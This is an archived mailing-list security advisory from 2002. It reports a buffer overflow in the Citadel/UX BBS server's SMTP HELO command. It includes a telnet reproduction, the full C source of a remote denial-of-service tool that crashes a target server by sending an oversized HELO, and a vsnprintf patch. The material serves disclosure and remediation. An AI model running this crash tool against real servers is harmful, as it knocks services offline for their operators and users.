('binary' encoding is not supported, stored as-is) What is Citadel/UX: Citadel/UX is an advanced client/server BBS program for operating highly interactive sites, both on the Internet and over dialup. Users can connect to Citadel/UX using any of telnet, WWW, or client software. Among the features supported are public and private message bases (rooms), electronic mail, real-time chat, paging, etc. The server is multithreaded and can easily support a large number of concurrent users. In addition, SMTP and POP3 servers are built-in for easy connection to Internet mail. Citadel/UX is both robust and mature, having been developed over the course of the past twelve years. Problem: I has found a buffer overflow in the Citadel/UX server. an attacker can execute a denial of service attack against it. Once the big buffer has been sent, the server is vulnerable. Example: [xperc@security citadel]$telnet 192.168.0.3 25 Trying 192.168.0.3... Connected to 192.168.0.3. Escape character is '^]'. 220 security ESMTP Citadel/UX server ready. helo [buffer] [buffer] is around 4096 characters. /* Citadel_Killer.c * * Remote Denial of Service Citadel/UX Server. * * by xpercat_private */ #include <stdio.h> #include <sys/socket.h> #include <netinet/in.h> #define MAXBUF 8000 #define MAXBUF2 MAXBUF+6 #define RECVBUF 256 #define CIT_SMTP 25 int main(int argc, char *argv[]) { int sockfd; char msg[RECVBUF],buf[MAXBUF],sendbuf [MAXBUF2]; struct sockaddr_in target; if(argc!=2){ fprintf(stderr,"Usage: %s target_address\n",*argv); exit(-1); } if((sockfd=socket (AF_INET,SOCK_STREAM,0))<0){ perror("socket"); exit(-1); } target.sin_family=AF_INET; target.sin_port=htons(CIT_SMTP); target.sin_addr.s_addr=inet_addr(argv[1]); if(connect(sockfd,(struct sockaddr*) &target,sizeof(target))<0){ perror("connect"); exit(-1); } if(recv(sockfd,msg,sizeof(msg)-1,0)<=0){ perror("recv"); exit(-1); } memset(buf,'a',MAXBUF); snprintf(sendbuf,sizeof(sendbuf),"helo % s",buf); strcat(sendbuf,"\n"); send(sockfd,sendbuf,strlen(sendbuf),0); close(sockfd); return 0; } Patch for this Vulnerability: --- citadel-old/sysdep.c Sat Dec 8 12:31:44 2001 +++ citadel/sysdep.c Sat Mar 9 05:51:11 2002 @@ -106,7 +106,7 @@ char buf[4096]; va_start(arg_ptr, format); - vsprintf(buf, format, arg_ptr); + vsnprintf(buf, sizeof(buf), format, arg_ptr); va_end(arg_ptr); if (loglevel <= verbosity) {
This archive was generated by hypermail 2b30 : Mon Mar 11 2002 - 11:28:29 PST